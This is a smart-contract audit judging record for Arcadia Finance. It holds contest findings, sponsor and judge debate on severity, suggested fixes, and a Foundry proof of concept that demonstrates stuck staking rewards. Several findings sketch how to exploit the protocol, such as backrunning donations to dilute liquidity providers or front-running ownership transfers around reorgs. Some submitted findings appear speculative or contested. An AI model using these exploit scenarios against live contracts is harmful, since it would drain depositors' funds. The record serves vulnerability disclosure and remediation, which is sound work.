I have said this in the discord channel, but since the conversation was moved here, I will add a quote so anyone can understand the context:

The private sequencer doesn't have anything to do with this issue; this can be done in separate blocks and with backruns, see my comment on issue #128. So, the attack has the following scenario:

  • a liquidation results in the unhappy flow with unsold collateral
  • collateral is sent to the admin
  • in the next block (or a bit later), once the attacker sees this onchain, the attacker deposits funds to the junior tranche
  • during a period of length T the admin manually sells the collateral
  • the admin donates the funds to the junior tranche
  • in the next block (or a bit later), once the attacker sees this onchain, the attacker redeems their shares

This results in gains for the attacker and losses for the original depositors, since they got less funds than they should have after the liquidation was manually resolved.

Also, wanted to state that my issue, #128 , is a duplicate of this one and everything said in this discussion is applicable to it and vice versa.

Thomas-Smets

I want to state again that donateToTranche is never enforced by the protocol by any means. It is a function that can, but does not have to, be used in case a manual liquidation is triggered.

Normally if the protocol functions as expected, auctions terminate automatically.

We did however foresee a flow where, if for some reason an auction does not end (which already means things did not work out as expected), a trusted user (set by the Creditor) can manually liquidate the assets.

After the assets are liquidated he can choose if and how to distribute the assets to potentially impacted users. donateToTranche is a function that might help in this process, but the protocol obliges nobody to use it. It is not part of the core functionality. It is a function to help in an already manual unhappy flow of an unhappy flow.

There are no guaranteed losses for LPs, and attackers have no guaranteed way to make profits, but have to put significant amounts of capital at stake.

Note on the recommendations:

Snapshot Mechanism: Take snapshots of share ownership at random intervals and distribute donations based on the snapshot to prevent exploitation.

Snapshots are not mutually exclusive from donateToTranche. We are in a manual trusted flow. If the manual liquidator could liquidate remaining assets before new people deposit in the Tranche he can use donateToTranche. If not they can use a snapshot and distribute funds.

Timelocks: Implement a timelock mechanism that requires funds to be locked for a certain period before they can be withdrawn.

This creates new issues and risks since the locking mechanisms of Tranches are already complex.

pa-sh0k

Before this issue was submitted, escalated and this discussion was started, it was not stated anywhere that backrunning activity would be monitored and that, if something malicious was noticed, other ways of settling the liquidation would be used.

If you had known about such an attack vector and already had other ways of handling it, it should have been stated in the known issues.

Thomas-Smets

It is a trusted manual flow executed by a permissioned role! And that is clearly stated in the code

nevillehuang

Agree with sponsor comments here, this issue should remain low severity.

pa-sh0k

The fact that it is executed by a permissioned role is already assumed in the issue. The issue is that when trusted manual flow is executed by a permissioned role using donateToTranche, users' funds can be stolen.

What is stated in the code (LendingPool.sol#L346-L347) about donateToTranche is the following:

It is supposed to serve as a way to compensate the jrTranche after an auction didn't get sold and was manually liquidated after cutoffTime.

From this comment it cannot be concluded that backrunning will be monitored and if something malicious is noticed, other ways of liquidation settling will be used.

The fact that this flow is executed by a permissioned role does not make it invincible.

What was stated previously:

I do acknowledge it exists, but we consider it a low, since the pay-out for attackers is uncertain and, as you said, it can be prevented if an attacker really tries to pull it off.

Obviously, this issue can't be prevented if the admin does not know about it. Since it was submitted, which is my job as a Watson, the admins now know about it and can prevent the loss of funds.

Addressing the Sherlock's criteria:

“Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained. The losses must exceed small, finite amount of funds, and any amount relevant based on the precision or significance of the loss”.

This issue requires certain external conditions and causes loss of funds if these conditions are met.

Regarding the following words of the sponsor:

attackers have no guaranteed way to make profits, but have to put significant amounts of capital at stake

The attacker is guaranteed to make a profit if the conditions are met. Also, depositing funds into the protocol as a liquidity provider for a short period of time, which the attacker would have to do, carries a near-zero risk of losing money; they would probably even earn money by providing liquidity.

Thomas-Smets

From this comment it cannot be concluded that backrunning will be monitored and if something malicious is noticed, other ways of liquidation settling will be used.

As we say in the comment:

It is supposed to serve as a way to compensate the jrTranche after an auction didn't get sold and was manually liquidated after cutoffTime.

not

It is supposed to serve as the way to compensate the jrTranche after an auction didn't get sold and was manually liquidated after cutoffTime.

Addressing the Sherlock's criteria:

We even state that this flow is not enforced by the smart contracts: https://github.com/arcadia-finance/lending-v2/blob/dcc682742949d56928e7e8e281839d2229bd9737/src/Liquidator.sol#L431

pa-sh0k

"Not enforced by the smart contracts" is equal to "it is manual", which is already assumed in the issue.

The issue is invalid if donateToTranche is never used for refunding the users. The comments imply that at some point it will be used for it, so, once it is used, the mentioned conditions are met and loss of funds is caused.

The argument that, if the admin wants to use donateToTranche but sees that an attacker made a large deposit trying to front-run the call, they would then decide to use another way of refunding is not applicable here, as before this issue was submitted the need for monitoring and preventing such an attack was not known.

If another way of refunding is chosen for some other reason, the attacker can simply withdraw their funds at no loss.

Atharv181

Talking about the severity, the identified vulnerability clearly meets the criteria for a medium severity issue. It results in a loss of funds, as highlighted by the Dilution of Donations, which directly impacts the intended recipients of those funds. While the exploit may require certain external conditions or specific states to occur, the potential for loss is significant and cannot be dismissed lightly.

The fact that the vulnerability exists and can lead to tangible financial harm underscores its severity. Even though the losses may not be immediate or guaranteed, they exceed a small, finite amount of funds, especially when considering the significance of the loss to affected lenders.

Thomas-Smets

Let's not use chatGPT when discussing the findings.

erosjohn

I would like to add that even if there is no attacker, this will harm other users' profits. As long as a new user deposits assets into jrTranche after _settleAuction() is called, when donateToTranche() is called later to compensate the jrTranche, the profit of the original users will be diluted. Obviously, a new user depositing assets into the tranche can happen at any time, and unless the protocol checks for it, there is no way to avoid it.

Czar102

The protocol will later "donate" these proceeds back to the impacted Tranches

It seems that the donation was to be to Tranches, not to Tranches' holders at the time of the auction/auction failure. This itself is a logical issue that should be recognized as the core issue here.

I think most doubts regarding the validity of this issue come from the fact that modifying the planned usage of the functionality solves this issue. I don't think this means that an issue is invalid.

If I am mistaken and there is other clear evidence that the donation was to be done to holders at the time the auctioned assets were subtracted from a tranche's balance, I will agree with invalidation. Right now, the sponsor's argument seems to be that the comments were suggesting a route for next steps, and these steps could be different. Without mentioning the mint monitoring checks, this seems to be equivalent to an approach of "in a manual action, we would notice this issue", while assuming that the issue will be found anyway doesn't invalidate its existence. @nevillehuang @Thomas-Smets do my points make sense?

nevillehuang

@Czar102 This issue is definitely possible, however, donateToTranche() is not a core functionality of the protocol, as it is solely used for manual liquidations to allow the manual liquidator to possibly serve as a way to compensate junior tranches. I suggest relooking at the sponsor comments here and here

pa-sh0k

@nevillehuang why "not a core functionality" is used as an argument for issue's invalidity? It is definitely in scope and is a part of the protocol

Thomas-Smets

@nevillehuang why "not a core functionality" is used as an argument for issue's invalidity? It is definitely in scope and is a part of the protocol

The function is never called from a function within the protocol. It is always someone from outside the protocol that must call the function. An attacker is never certain the function will be called; they cannot enforce it in any way.

If you read my comments above, I am not denying it is an issue. I stated that since there is no guarantee of profit, and it can even be avoided that the attacker ever profits, I consider it a low issue.

Czar102

Is there an expectation of a donation of nonzero proceeds in the unhappy flow? Or are positive proceeds not expected? @Thomas-Smets

Atharv181

I would like to add that even if there is no attacker, this will harm other users' profits. As long as a new user deposits assets into jrTranche after _settleAuction() is called, when donateToTranche() is called later to compensate the jrTranche, the profit of the original user will be diluted.

Also dilutes the donations for users.

Atharv181

(screenshot of the donateToTranche NatSpec comment)

It is clearly mentioned here that it is used to compensate the tranche after an auction didn't get sold (unhappy flow)

Thomas-Smets

My point of view: it is a low issue. I feel discussing it more is not that useful since we are just in a yes-no discussion.

We are talking about an emergency situation where the protocol already didn't function as expected and that has to be resolved 100% manually. And in no way is donateToTranche() enforced to be called; if it can be called it makes things easier, if not the situation can still be resolved 100% without losses to users.

  1. It should never occur in the first place (low probability).
  2. If an attacker wants to make significant profits with this, they have to put a lot of funds in the Tranche (on the order of the total liquidity in the Tranche). This also can't be done atomically or via flash loans, so it has to be actual attacker funds locked in the Tranche. Even if it happens, the dilution is a share of a single badDebt amount spread over all LPs.
  3. The attacker cannot trigger donateToTranche() or be sure it is ever triggered. The recipient of the Account is a permissioned role, and is not forced to use donateToTranche() in this specific flow.

@Czar102 Is there an expectation of a donation of nonzero proceeds in the unhappy flow? Or are positive proceeds not expected?

Not sure I fully understand the question. auctionBoughtIn is only called if an auction failed; that can be due to market conditions (-> no profit) or due to technical problems (a reverting getValue or something like that). In the latter case it can be that the proceeds of the manually liquidated Account were bigger than the initial debt.

@Atharv181, It is clearly mentioned here that it is used to compensate the tranche after an auction didn't get sold (unhappy flow)

We say very clearly: it is A way. We do not say it is THE way. It is not enforced by the logic of the protocol!

Czar102

The situation of unhappy flow hasn't been taken out of scope (despite it being perceived as extremely improbable), and it has been explicitly mentioned that the donateToTranche() is to be used in scenarios where funds from the liquidation are to be returned. An action not being enforced by the smart contract logic doesn't make the intended use of a function out of scope.

Since this approach is exploitable, I'm planning to consider it a valid Medium severity issue.

Czar102

Result: Medium Has duplicates

sherlock-admin3

Escalations have been resolved successfully!

Escalation status:

Issue M-6: LendingPool#flashAction is broken when trying to refinance position across LendingPools due to improper access control

Source: #145

Found by

0x52

Summary

When refinancing an account, LendingPool#flashAction is used to facilitate the transfer. However, due to access restrictions on updateActionTimestampByCreditor, the call made from the new creditor will revert, blocking any account transfers. This completely breaks refinancing across lenders, which is a core functionality of the protocol.

Vulnerability Detail

LendingPool.sol#L564-L579

IAccount(account).updateActionTimestampByCreditor();

asset.safeTransfer(actionTarget, amountBorrowed);

{
    uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);
    if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();
}

We see above that account#updateActionTimestampByCreditor is called before flashActionByCreditor.

AccountV1.sol#L671

function updateActionTimestampByCreditor() external onlyCreditor updateActionTimestamp { }

When we look at this function, it can only be called by the current creditor. When refinancing a position, this function is actually called by the pending creditor, since the flash action should originate from there. This will cause the call to revert, making it impossible to refinance across LendingPools.

Impact

Refinancing is impossible

Code Snippet

LendingPool.sol#L529-L586

Tool used

Manual Review

Recommendation

Account#updateActionTimestampByCreditor() should be callable by BOTH the current and pending creditor
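
A minimal sketch of one way to do this, assuming the Account tracks the pending creditor in a variable such as pendingCreditor (a hypothetical name used only for illustration; per the discussion below, the shipped fix instead removed this call in favour of a callback):

// Sketch only: accept the call from either the current or the pending creditor.
// `pendingCreditor` and the error name are assumptions, not existing AccountV1 members.
function updateActionTimestampByCreditor() external updateActionTimestamp {
    if (msg.sender != creditor && msg.sender != pendingCreditor) revert AccountErrors.OnlyCreditor();
}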

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

invalid

sherlock-admin

The protocol team fixed this issue in PR/commit arcadia-finance/lending-v2#133.

Thomas-Smets

The fix consists of two PRs:

IAm0x52

Fix looks good. Removes the updateActionTimestampByCreditor call and instead uses a callback to enforce nonreentrant and prevent ERC777s from reentering

sherlock-admin4

The Lead Senior Watson signed off on the fix.

2023-12-arcadia-judging's Issues

0xVolodya - reward tokens will be stuck in staking contract

0xVolodya

medium

reward tokens will be stuck in staking contract

Summary

Some amount of tokens will be stuck in the staking contract after users burn their positions. See the POC below.

Vulnerability Detail

The _getRewardBalances function calculations are off. The problem arises after two consecutive mints, on the third interaction with a staking module. An amount of rewards equal to the pending rewards at the second interaction is then claimed but not added to the reward balances.

    function _getRewardBalances(AssetState memory assetState_, PositionState memory positionState_)
        internal
        view
        returns (AssetState memory, PositionState memory)
    {
        if (assetState_.totalStaked > 0) {
            // Calculate the new assetState
            // Fetch the current reward balance from the staking contract.
            uint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);
            // Calculate the increase in rewards since last Asset interaction.
            uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal;
            uint256 deltaRewardPerToken = deltaReward.mulDivDown(1e18, assetState_.totalStaked);
            // Calculate and update the new RewardPerToken of the asset.
            // unchecked: RewardPerToken can overflow, what matters is the delta in RewardPerToken between two interactions.
            unchecked {
                assetState_.lastRewardPerTokenGlobal =
                    assetState_.lastRewardPerTokenGlobal + SafeCastLib.safeCastTo128(deltaRewardPerToken);
            }
            // Update the reward balance of the asset.
            assetState_.lastRewardGlobal = SafeCastLib.safeCastTo128(currentRewardGlobal);

            // Calculate the new positionState.
            // Calculate the difference in rewardPerToken since the last position interaction.
            // unchecked: RewardPerToken can underflow, what matters is the delta in RewardPerToken between two interactions.
            unchecked {
                deltaRewardPerToken = assetState_.lastRewardPerTokenGlobal - positionState_.lastRewardPerTokenPosition;
            }
            // Calculate the rewards earned by the position since its last interaction.
            // unchecked: deltaRewardPerToken and positionState_.amountStaked are smaller than type(uint128).max.
            unchecked {
                deltaReward = deltaRewardPerToken * positionState_.amountStaked / 1e18;
            }
            // Update the reward balance of the position.
            positionState_.lastRewardPosition =
                SafeCastLib.safeCastTo128(positionState_.lastRewardPosition + deltaReward);
        }
        // Update the RewardPerToken of the position.
        positionState_.lastRewardPerTokenPosition = assetState_.lastRewardPerTokenGlobal;

        return (assetState_, positionState_);
    }

AbstractStakingAM.sol#L529

Impact

Code Snippet

Tool used

POC

// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.22;

import "forge-std/Test.sol";
import {StakedStargateAM, IRegistry, ILpStakingTime} from "../src/asset-modules/Stargate-Finance/StakedStargateAM.sol";


contract Registry {
    function addAsset(address asset) public {
    }

    function isAllowed(address asset, uint256 assetId) public view returns (bool){
        return true;
    }
}
interface IERC20 {
    event Approval(address indexed owner, address indexed spender, uint256 value);
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external view returns (string memory);

    function symbol() external view returns (string memory);

    function decimals() external view returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender) external view returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(address from, address to, uint256 value) external returns (bool);
    function withdraw(uint256 wad) external;
    function deposit(uint256 wad) external returns (bool);
    function owner() external view returns (address);
}

contract RewardsStuck is Test {
    IERC20 USDbCpool = IERC20(0x4c80E24119CFB836cdF0a6b53dc23F04F7e652CA);
    IERC20 rewardToken = IERC20(0xE3B53AF74a4BF62Ae5511055290838050bf764Df);
    ILpStakingTime LpStakingTime = ILpStakingTime(0x06Eb48763f117c7Be887296CDcdfad2E4092739C);

    StakedStargateAM stakedStargateAM;
    Registry registry;
    address user1 = 0x160B6772c9976d21ddFB3e3211989Fa099451af7;
    address user2 = 0x2db0500e1942626944efB106D6A66755802Cef20;

    function setUp() public {
        vm.createSelectFork("https://mainnet.base.org", 10_116_031);

        registry = new Registry();
    }

    function test() external {
        stakedStargateAM = new StakedStargateAM(address(registry), address(LpStakingTime));
        stakedStargateAM.addAsset(1);
        deal(address(USDbCpool), address(this), 10000);
        deal(address(USDbCpool), address(user1), 10000);
        USDbCpool.approve(address(stakedStargateAM), type(uint256).max);

        uint positionId = stakedStargateAM.mint(address(USDbCpool), 10000);
        console.log("------------------");

        vm.warp(block.timestamp + 1000);

        vm.startPrank(address(user1));
        USDbCpool.approve(address(stakedStargateAM), type(uint256).max);
        uint positionId2 = stakedStargateAM.mint(address(USDbCpool), 10000);

        vm.warp(block.timestamp + 1000);
        console.log("staked in the middle: ", stakedStargateAM.totalStaked(address(USDbCpool)));

        vm.stopPrank();
        stakedStargateAM.burn(positionId);

        vm.warp(block.timestamp + 1000);

        vm.startPrank(address(user1));
        stakedStargateAM.burn(positionId2);
        console.log("--------after buring all----------");

        console.log("rewardToken.balanceOf(address(stakedStargateAM)): ", rewardToken.balanceOf(address(stakedStargateAM)));
        console.log("rewardToken.balanceOf(address(address(this))): ", rewardToken.balanceOf(address(this)));
        console.log("rewardToken.balanceOf(address(user1)): ", rewardToken.balanceOf(address(user1)));
        console.log("stakedStargateAM.totalStaked(address(USDbCpool)) ", stakedStargateAM.totalStaked(address(USDbCpool)));
    }

    function onERC721Received(address, address, uint256, bytes memory) external returns (bytes4) {
        return this.onERC721Received.selector;
    }
}
  ------------------
  staked in the middle:  20000
  --------after buring all----------
  rewardToken.balanceOf(address(stakedStargateAM)):  48055843493
  rewardToken.balanceOf(address(address(this))):  72083765165
  rewardToken.balanceOf(address(user1)):  72083765165
  stakedStargateAM.totalStaked(address(USDbCpool))  0

Manual Review

Recommendation

Either create a function so the owner can sweep the remaining tokens, change the formula so that no tokens are left over, or give all the remaining reward tokens to the last staker.
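
A minimal sketch of the first option, an owner-only sweep (REWARD_TOKEN and the owed-rewards accounting are assumptions for illustration, not existing members of the staking module):

// Sketch only: lets the owner recover reward tokens that are no longer claimable by any position.
// REWARD_TOKEN is an assumed ERC20 state variable and safeTransfer assumes solmate's
// SafeTransferLib is in scope; a real implementation must first subtract rewards still owed
// to open positions before sweeping.
function sweepUnclaimableRewards(address receiver) external onlyOwner {
    uint256 leftover = REWARD_TOKEN.balanceOf(address(this));
    REWARD_TOKEN.safeTransfer(receiver, leftover);
}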

Duplicate of #38

jesjupyer - Reorg attack is still possible in L2s

jesjupyer

medium

Reorg attack is still possible in L2s

Summary

The contract is meant to be deployed on BASE and later on Optimism, Arbitrum, and other L2s, but a reorg attack may make some attack vectors possible. For example, the AccountV1::COOL_DOWN_PERIOD check can be bypassed, allowing the old Owner to front-run a transferFrom.

Vulnerability Detail

The contract is meant to be deployed on BASE and later on Optimism, Arbitrum, and other L2s, but a reorg attack may make some attack vectors possible.

For example, in AccountV1::transferOwnership, a COOL_DOWN_PERIOD of 5 mins is applied to prevent the old Owner from front-running a transferFrom.

        if (block.timestamp <= lastActionTimestamp + COOL_DOWN_PERIOD) revert AccountErrors.CoolDownPeriodNotPassed();

The initial perspective is that if the asset is transferred out right before the ownership transfer, the transaction would revert to protect the new owner.

However, since a reorg attack could last for several minutes (even 10+ mins), the COOL_DOWN_PERIOD may not be long enough to protect against such an attack.

Consider the following scenario:

  1. The old owner front-runs the transferFrom related function to move assets before the ownership is transferred.
  2. By default, this should revert. But if the reorg occurs, the transferFrom happens first, and the transferOwnership happens 5 minutes later. Then, the transaction will not revert.

Impact

A reorg attack may make some attack vectors possible. For example, the check on AccountV1::COOL_DOWN_PERIOD can be bypassed, allowing the old Owner to front-run with a transferFrom to steal the funds of the new owner.

Code Snippet

AccountV1::transferOwnership

    function transferOwnership(address newOwner) external onlyFactory notDuringAuction {
        if (block.timestamp <= lastActionTimestamp + COOL_DOWN_PERIOD) revert AccountErrors.CoolDownPeriodNotPassed();

        // The Factory will check that the new owner is not address(0).
        owner = newOwner;
    }

Tool used

Manual Review

Recommendation

Reorgs should be taken into account. For example, consider making COOL_DOWN_PERIOD longer to mitigate the issue (see the sketch below).
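
A minimal sketch of that mitigation; the declaration style and the 30-minute value are illustrative assumptions, not values taken from the codebase:

// Sketch only: lengthen the cool-down so that a multi-minute reorg cannot reorder an
// owner-initiated transferFrom in front of the ownership transfer.
uint256 internal constant COOL_DOWN_PERIOD = 30 minutes; // previously 5 minutes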

Anubis - Potential Reentrancy Vulnerability in createAccount Function

Anubis

high

Potential Reentrancy Vulnerability in createAccount Function

Summary

The createAccount function in the provided smart contract may be vulnerable to a reentrancy attack, potentially allowing malicious actors to manipulate account creation.

Vulnerability Detail

The createAccount function in the contract appears to interact with an external contract (via the IAccount(account).initialize(...) call) without proper reentrancy guards. If the IAccount contract is malicious or compromised, it could potentially call back into the createAccount function, leading to unexpected behavior or state manipulation.

Impact

Reentrancy attacks can have severe consequences, especially in functions that change critical state variables or transfer assets. In this case, if an attacker is able to re-enter the createAccount function, they might be able to:

  • Create multiple accounts with the same parameters.
  • Manipulate the state of the contract to their advantage, possibly affecting the integrity of the account creation process.

The impact can be exemplified as follows:

  1. Attacker deploys a malicious IAccount contract.
  2. Attacker calls createAccount, triggering the initialization of their malicious contract.
  3. During initialization, the malicious contract makes a reentrant call to createAccount.

This reentrancy can lead to multiple accounts being created unintentionally or state variables being modified unexpectedly.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/Factory.sol#L84-L88

Tool used

Manual Review

Recommendation

To mitigate this vulnerability, consider implementing a reentrancy guard using the nonReentrant modifier from the OpenZeppelin library. This modifier ensures that the function cannot be re-entered while it's still executing. Modify the createAccount function as follows:

import "@openzeppelin/contracts/security/ReentrancyGuard.sol";

contract Factory is IFactory, ERC721, FactoryGuardian, ReentrancyGuard {
    // ... [omitted code] ...

    function createAccount(uint256 salt, uint256 accountVersion, address creditor)
        external
        whenCreateNotPaused
        nonReentrant // Add this line
        returns (address account)
    {
        // ... [existing function code] ...
    }

    // ... [omitted code] ...
}


n1punp - Deployment on L2 will fail since most L2s are currently incompatible with solidity 0.8.20+ (no PUSH0 opcode support yet).

n1punp

medium

Deployment on L2 will fail since most L2s are currently incompatible with solidity 0.8.20+ (no PUSH0 opcode support yet).

Summary

Deployment on L2 will fail since most L2s are currently incompatible with solidity 0.8.20+ (no PUSH0 opcode support yet).

Vulnerability Detail

Most L2s currently do not support the PUSH0 opcode, so Solidity 0.8.20+ is still not supported. For example, see the documentation on Arbitrum Solidity support:
https://docs.arbitrum.io/for-devs/concepts/differences-between-arbitrum-ethereum/solidity-support

Impact

Smart contracts will not be able to be deployed on most L2s.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/guardians/LendingPoolGuardian.sol#L5 (applies to all contracts)

Tool used

Manual Review

Recommendation

  • Downgrade the Solidity version to 0.8.19 for the time being, until PUSH0 is supported (Arbitrum has announced that it plans to support it soon); see the sketch below.
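
One way to apply this, sketched below (the pragma change mirrors the recommendation; the note about evm_version is a general Foundry/solc fact, not taken from the repo):

// Sketch only: pin the pragma below 0.8.20 so the compiler never emits PUSH0.
// Alternatively, 0.8.20+ can be kept while setting evm_version = "paris" in foundry.toml,
// which also prevents PUSH0 from being emitted.
pragma solidity 0.8.19;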

popeye - `ChainlinkOM::_getLatestAnswer` may return invalid price due to zero value acceptance.

popeye

medium

ChainlinkOM::_getLatestAnswer may return invalid price due to zero value acceptance.

Summary

The ChainlinkOM::_getLatestAnswer() function may return an invalid price (answer) due to its acceptance of zero as a valid price. This flaw arises from the conditional check that improperly allows answer_ >= 0, including zero, which is not a valid price.

Vulnerability Detail

The ChainlinkOM::_getLatestAnswer() internal function fetches the latest price data from the Chainlink oracle contract. This data is returned in a tuple that includes the answer_ variable containing the latest price:

    function _getLatestAnswer(OracleInformation memory oracleInformation_)
        internal
        view
        returns (bool success, uint256 answer)
    {
        try IChainLinkData(oracleInformation_.oracle).latestRoundData() returns (
            uint80 roundId, int256 answer_, uint256, uint256 updatedAt, uint80
        ) {
            if (
@>              roundId > 0 && answer_ >= 0 && updatedAt > block.timestamp - oracleInformation_.cutOffTime
                    && updatedAt <= block.timestamp
            ) {
                success = true;
                answer = uint256(answer_);
            }
        } catch { }
    }

This answer_ price is validated with the following check:

answer_ >= 0

This allows a price of 0 to be considered a valid price. However, 0 is likely an incorrect price and should be considered invalid.

Impact

It allows zero price validation in ChainlinkOM::_getLatestAnswer() , risking systemic inaccuracies in asset pricing.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/oracle-modules/ChainlinkOM.sol#L94
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/oracle-modules/ChainlinkOM.sol#L121-L124
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/oracle-modules/ChainlinkOM.sol#L144

Tool used

Manual Review

Recommendation

Update the ChainlinkOM::_getLatestAnswer() function to ensure that answer_ must be strictly greater than zero.

function _getLatestAnswer(OracleInformation memory oracleInformation_) 
	internal 
	view 
	returns (bool success, uint256 answer)
{
	try IChainLinkData(oracleInformation_.oracle).latestRoundData() returns (
		uint80 roundId, int256 answer_, uint256, uint256 updatedAt, uint80
	) {
		if (
--		roundId > 0 && answer_ >= 0 && updatedAt > block.timestamp - oracleInformation_.cutOffTime && updatedAt <= block.timestamp
++ 		roundId > 0 && answer_ > 0 && updatedAt > block.timestamp - oracleInformation_.cutOffTime && updatedAt <= block.timestamp
		) {
			success = true;
			answer = uint256(answer_);
		}
	} catch { }
}

Duplicate of #126

0xrice.cooker - Rounding up when bidding without protection leads to bidders spending more to buy the borrower's collateral than expected

0xrice.cooker

medium

Rounding up when bidding without protection leads to bidders spending more to buy the borrower's collateral than expected

Summary

Rounding up when bidding without protection leads to bidders spending more to buy the borrower's collateral than expected

Vulnerability Detail

There are two rounding issues to address in the Liquidator contract.
First of all, the total share of any liquidation can be bigger than 10000, up to 10015:

    function _getAssetShares(AssetValueAndRiskFactors[] memory assetValues)
        internal
        pure
        returns (uint32[] memory assetShares)
    {
        uint256 length = assetValues.length;
        uint256 totalValue;
        for (uint256 i; i < length; ++i) {
            unchecked {
                totalValue += assetValues[i].assetValue;
            }
        }
        assetShares = new uint32[](length);
        
        if (totalValue == 0) return assetShares;
        
        for (uint256 i; i < length; ++i) {
            assetShares[i] = uint32(assetValues[i].assetValue.mulDivUp(ONE_4, totalValue));//<@@ all rounding up -> total asset share will bigger than 10000
        }
    }

Secondly, since assetShares[i] for any collateral will always be lower than 10000, the rounding up here can make the bidder spend more money when bidding:

    function _calculateTotalShare(AuctionInformation storage auctionInformation_, uint256[] memory askedAssetAmounts)
        internal
        view
        returns (uint256 totalShare)
    {
        uint256[] memory assetAmounts = auctionInformation_.assetAmounts;
        uint32[] memory assetShares = auctionInformation_.assetShares;
        if (assetAmounts.length != askedAssetAmounts.length) {
            revert LiquidatorErrors.InvalidBid();
        }

        for (uint256 i; i < askedAssetAmounts.length; ++i) {
            unchecked {
                totalShare += askedAssetAmounts[i].mulDivUp(assetShares[i], assetAmounts[i]);//<@@ because the assetShares[i] < 10000 -> lead to to rounding issue
            }
        }
    }

Let's consider a scenario:
- Say a borrower gets liquidated and has collateral worth 100k.
- Say there's one asset in the bundle with an amount of 1e18 and a value of 1001$ -> 101 shares.
- A bidder wants to buy 0.1e18 of that asset, which is only 10.1 shares, but in reality must pay for 11 shares because of the rounding up.
- Say the bid price of that asset is still 1001$ per 1e18 tokens. The bidder must pay 110.11$ for 0.1e18 that is valued at 100.1$ -> losing 10.01$.

Note that a borrower can have up to 15 types of collateral. If the bidder scatters askedAssetAmounts across multiple assets, the loss due to rounding can be massive.

Moreover, the total share of an auction will likely not be exactly 10000; it will be in the range [10000, 10015], depending on the number of asset types in the account. The reason is that, due to the volatility of asset values, there is an extremely low chance that assetValues[i].assetValue * ONE_4 % totalValue == 0, hence rounding up will happen and the total share will surpass 10000.

Impact

Impact 1: The bidder has no protection on the outcome of the bid, and is therefore vulnerable to losses when bidding.
Impact 2: Bidders will on average have to pay [0.01% - 0.15%] more. As a consequence, bidders will need to wait longer than expected for a desirable price to buy.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/Liquidator.sol#L33

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/Liquidator.sol#L266

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/Liquidator.sol#L340

Tool used

Manual Review

Recommendation

Some potential fix:

  • Change ONE_4 const in Liquidator contract from 1e4 to 1e18 to avoid rounding up
  • Have an input to check maxAssetWillPay in Liquidator.bid() (see the sketch after this list)
  • Make bidder buy in askedAssetShares instead of askedAssetAmounts
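
A minimal sketch of the second option, a bidder-supplied cap on the amount paid (the maxPrice parameter, the error, the auctionInformation mapping and the internal helpers shown are assumptions that mirror the report's description, not the real Liquidator.bid() signature):

// Sketch only: the bidder passes the maximum amount they are willing to pay for the asked amounts.
function bid(address account, uint256[] memory askedAssetAmounts, bool endAuction, uint256 maxPrice) external {
    AuctionInformation storage auctionInformation_ = auctionInformation[account];
    uint256 totalShare = _calculateTotalShare(auctionInformation_, askedAssetAmounts);
    uint256 price = _calculateBidPrice(auctionInformation_, totalShare);
    // Revert if rounding up (or a price move) pushed the cost above what the bidder accepted.
    if (price > maxPrice) revert LiquidatorErrors.MaxPriceExceeded();
    // ... existing transfer and settlement logic ...
}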

0xrice.cooker - Wrong integration with Stargate's LPStakingTime contract leads to all users earning less interest than expected and rewards getting stuck in the StakedStargateAM contract

0xrice.cooker

high

Wrong integration with Stargate's LPStakingTime contract leads to all users earning less interest than expected and rewards getting stuck in the StakedStargateAM contract

Summary

Wrong integration with Stargate's LPStakingTime contract leads to all users earning less interest than expected and rewards getting stuck in the StakedStargateAM contract

Vulnerability Detail

Stargate's LPStakingTime has no method dedicated to only withdrawing rewards. Because of that, LPStakingTime.deposit() and LPStakingTime.withdraw(), besides depositing/withdrawing funds, also send the accumulated reward to the caller.

In StakedStargateAM there is no logic to account for the reward received during a deposit() or withdraw() call, so the protocol does not even know that the reward has already been distributed.

Impact

Users who own a StakedStargateAM NFT will lose the majority of their rewards, and the StakedStargateAM contract has no method to take the undistributed rewards out.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/accounts-v2/src/asset-modules/Stargate-Finance/StakedStargateAM.sol#L82C1-L97C6

https://basescan.org/address/0x06Eb48763f117c7Be887296CDcdfad2E4092739C#code#F1#L159

https://basescan.org/address/0x06Eb48763f117c7Be887296CDcdfad2E4092739C#code#F1#174

Tool used

Manual Review

Recommendation

+   uint256 cache;
    
    function _stake(address asset, uint256 amount) internal override {
+	cache += LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
        ERC20(asset).approve(address(LP_STAKING_TIME), amount);

        LP_STAKING_TIME.deposit(assetToPid[asset], amount);
    }

    function _withdraw(address asset, uint256 amount) internal override {
+	cache += LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
        LP_STAKING_TIME.withdraw(assetToPid[asset], amount);
    }

    function _claimReward(address asset) internal override {
+	cache = 0;
        LP_STAKING_TIME.withdraw(assetToPid[asset], 0);
    }

    function _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {
-       currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
+       currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this)) + cache;
    }

Duplicate of #38

cawfree - It is possible to create more than `256` tranches.

cawfree

